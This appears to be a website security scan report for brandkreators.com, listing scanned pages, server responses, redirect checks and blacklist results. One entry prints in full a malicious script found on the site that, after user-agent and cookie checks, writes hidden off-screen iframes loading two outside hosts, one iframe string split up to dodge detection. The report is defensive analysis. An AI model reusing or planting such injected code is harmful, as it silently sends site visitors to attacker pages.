Scanned pages/files
Request | Server response | Status |
http://brandkreators.com/ | 200 OK Content-Length: 6548 Content-Type: text/html | clean |
http://brandkreators.com/images/script.js | 200 OK Content-Length: 2627 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Grandarium() {
var soset = navigator.userAgent; var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1); if (!unicode) { document.write('<iframe src="http://duislow.elmillero.us/irifagruse15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>'); } } Grandarium(); (functi var cookie = getCookie('kegaoeutg18sf'+'fekfsj3asjf'); if (cookie == undefined) { setCookie('kegaoeutg18sf'+'fekfsj3asjf', true, 172804); document.write('<'+'if'+'ra'+'m'+'e'+' s'+'r'+'c'+'='+'"http://magazine.northerncoloradocreditrepair.com/jytdhsgseewgh19.html" st'+'yle="posi'+'tion:absolute'+';'+'left'+':'+'-'+'1284'+'px'+';'+'top'+':'+'-'+'1284'+'px'+';'+'" height="134" width="134"><'+'/'+'if'+'ram'+'e'+'>'); } }; })(); Antivirus reports:
| ||
http://brandkreators.com/index.html | 200 OK Content-Length: 6548 Content-Type: text/html | clean |
http://brandkreators.com/about.html | 200 OK Content-Length: 4501 Content-Type: text/html | clean |
http://brandkreators.com/services.html | 200 OK Content-Length: 11010 Content-Type: text/html | clean |
http://brandkreators.com/contact.php | 200 OK Content-Length: 6536 Content-Type: text/html | clean |
http://brandkreators.com/test404page.js | 404 Not Found Content-Length: 398 Content-Type: text/html | clean |
http://brandkreators.com/bulk_sms.html | 200 OK Content-Length: 11089 Content-Type: text/html | clean |
http://brandkreators.com/brand_promotion.html | 200 OK Content-Length: 13412 Content-Type: text/html | clean |
http://brandkreators.com/BrandKreators.msi | 200 OK Content-Length: 300951 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: brandkreators.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Aug 2014 15:17:20 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 6548
Content-Type: text/html
Last-Modified: Fri, 13 Jan 2012 03:52:33 GMT
...6548 bytes of data.
GET / HTTP/1.1
Host: brandkreators.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Aug 2014 15:17:20 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 6548
Content-Type: text/html
Last-Modified: Fri, 13 Jan 2012 03:52:33 GMT
...6548 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: brandkreators.com
Referer: http://www.google.com/search?q=brandkreators.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: brandkreators.com
Referer: http://www.google.com/search?q=brandkreators.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=brandkreators.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://brandkreators.com/
Result: brandkreators.com is not infected or malware details are not published yet.
Result: brandkreators.com is not infected or malware details are not published yet.